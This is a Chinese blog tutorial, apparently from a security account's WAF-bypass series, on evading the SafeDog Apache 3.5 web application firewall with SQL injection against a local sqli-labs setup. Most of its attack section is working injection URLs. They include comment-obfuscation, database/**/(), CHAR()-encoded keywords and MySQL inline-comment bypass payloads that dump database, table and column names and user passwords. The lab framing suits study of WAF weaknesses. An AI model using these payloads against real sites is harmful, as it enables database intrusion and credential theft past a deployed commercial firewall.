SQL注入安全狗apache3.5.12048版本绕过

最新推荐文章于 2023-08-02 18:13:09 发布

乌鸦安全

最新推荐文章于 2023-08-02 18:13:09 发布

阅读量1.2k

点赞数

分类专栏：免杀和bypass 文章标签： sql 安全乌鸦安全 Bypass 安全狗

本文链接：https://blog.csdn.net/csdnmmd/article/details/122699003

版权

免杀和bypass 专栏收录该内容

17 篇文章 15 订阅

订阅专栏

微信公众号：乌鸦安全

扫取二维码获取更多信息！

更新时间：2021.04.28

前言

没错，这次我们又来了，还是那条狗，绕过的是安全狗apache3.5.12048版本，个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件，因为当时安装之后文件就删了，这次有，后台回复关键字：

安全狗3.5 获取

目前我们已经发布关于sql注入的文章和教学：

2019.11.20 更新sqli-labs 全部视频更新完成

SQL注入-安全狗超大数据包绕过

SQL注入安全狗apache4.0.26655绕过

视频版：

https://space.bilibili.com/29903122

0x01 waf

安全狗 safedogwzApacheV3.5.exe

0x02 搭建

网站：apache+mysql+php

phpstudy2018

php版本4.4.45

sqli-labs

0x03 报错注入

关键句

select schema_name from information_schema.schemata;select table_name from information_schema.tables where table_schema='security';select column_name from information_schema.columns where table_name='users';select username,password from security.users;

手动注入

查库：select schema_name from information_schema.schemata查表：select table_name from information_schema.tables where table_schema='security'查列：select column_name from information_schema.columns where table_name='users'查字段：select username,password from security.users

(下面的内容不要直接复制)http://127.0.0.1/sqli/Less-1/?id=1’     查看是否有注入http://127.0.0.1/sqli/Less-1/?id=1‘ order by 3--+   查看有多少列http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,3--+ 查看哪些数据可以回显http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,database()--+  查看当前数据库http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,schema_name from information_schema.schemata limit 4,1--+  查看数据库security或者是：http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 查看所有的数据库http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表，或者是：http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,column_name from information_schema.columns where table_name=0x7573657273--+ 查询列信息或者是：http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+ 查看所以的列信息http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,concat_ws(’~‘,username,password) from security.users limit 1,1--+ 查询一个账号和密码或者是：http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+  直接可以得到所有的账号和密码，并且使用~符号进行分割。

工具注入

0x04 安全狗安装

在安装的时候提示有一个服务名不能为空，这里需要phpstudy调整至系统服务模式。

然后调出任务管理器界面，查看所有服务

将服务写上,安装成功之后，注意不要选择在线安装服务器安全狗，安装之后会显示启动web服务失败，这里将phpstudy重启即可

使用恶意的参数进行测试下，安全狗生效

运行脚本：

网站防护日志：

0x05 Fuzz

在mysql的fuzz里面一般有以下的思路：（不止）

使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……

1. 测试单引号

http://10.211.55.9/Less-1/?id=1'显示正常

http://10.211.55.9/Less-1/?id=1' --+ 显示正常

2. 测试and

直接使用and的时候，没有异常，但是使用and 1=1的时候，出现问题

正常

拦截

这里测试发现 and 可以出现，但是1不可以出现，既然无法绕过，这里尝试使用注释符来进行测试

3. 测试注释符

在这随机手写了一个，然后就过了。。。。

/*@%$^(*/

http://10.211.55.9/Less-1/?id=1' and/*@%$^(*/ 1=1 --+

继续：

使用order by指令

http://10.211.55.9/Less-1/?id=1' order by 4 --+

这里可以测出来一共存在三列，然后使用联合查询来试试

http://10.211.55.9/Less-1/?id=1' union select 1,2,3 --+

如果只有union呢？试试

http://10.211.55.9/Less-1/?id=1' union --+ 正常

select呢

http://10.211.55.9/Less-1/?id=1' union select --+

使用刚刚的注释符试试

http://10.211.55.9/Less-1/?id=1' union /*@%$^(*/ select --+正常

继续

http://10.211.55.9/Less-1/?id=1' union /*@%$^(*/ select 1,2,3 --+显示正常

继续：

http://10.211.55.9/Less-1/?id=-1'  union /*@%$^(*/ select 1,2,3 --+

正常

那就可以来取数据了

http://10.211.55.9/Less-1/?id=-1'  union /*@%$^(*/ select 1,2, database() --+

错误

看来database()被过滤，那这里面对其进行绕过

4. 测试database()

在这里经过多次测试之后发现，database()可以使用database/**/()进行绕过

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2, database/**/() --+

显示正常

此时已经获得了数据库名称为security

继续操作来进行下一步，直到能够获取所有的关键信息

现在已知数据库之后，开始获取数据库中的表信息：

对第三个位置来获取表信息：

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表，或者是：http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的

试试：

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1 --+

情理之中，开始准备fuzz

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name     --+

正常

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name   from  --+

此时显示异常

经过fuzz发现，from是关键字，table_name 并不是关键字，所以需要对from进行绕过

经过多次多组fuzz发现，这里需要使用chr()来进行绕过

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   CHAR(102, 114, 111, 109)   --+

成功

但是在这里是没法继续下去的

内联注释知识点

/*!select*/: 相当于没有注释
/*!12345select*/: 当12345小于当前mysql版本号的时候，注释不生效，当大于版本号的时候注释生效。
/*![]*/: []中括号中的数字若填写则必须是5位

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(schema_name)  /*!00000%23/*%0afrom */ information_schema.schemata   --+

fuzz成功

这里使用

/!%23/%0afrom*/

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(table_name)  /*!%23/*%0afrom*/ information_schema.tables where table_schema='security' --+

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(column_name)  /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2,group_concat(concat_ws(0x7e, username, password))  /*!%23/*%0afrom*/ security.users --+

tamper编写

后面出视频

微信公众号：乌鸦安全

扫取二维码获取更多信息！

乌鸦安全

关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
SQL注入安全狗apache3.5.12048版本绕过

微信公众号：乌鸦安全扫取二维码获取更多信息！更新时间：2021.04.28前言没错，这次我们又来了，还是那条狗，绕过的是安全狗apache3.5.12048版本，个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件，因为当时安装之后文件就删了，这次有，后台回复关键字：安全狗3.5 获取目前我们已经发布关于sql注入的文章和教学：2019.11.20 更新sqli-labs 全部视频更新完成SQL注入-安全狗超大数据包绕过SQL...
复制链接

扫一扫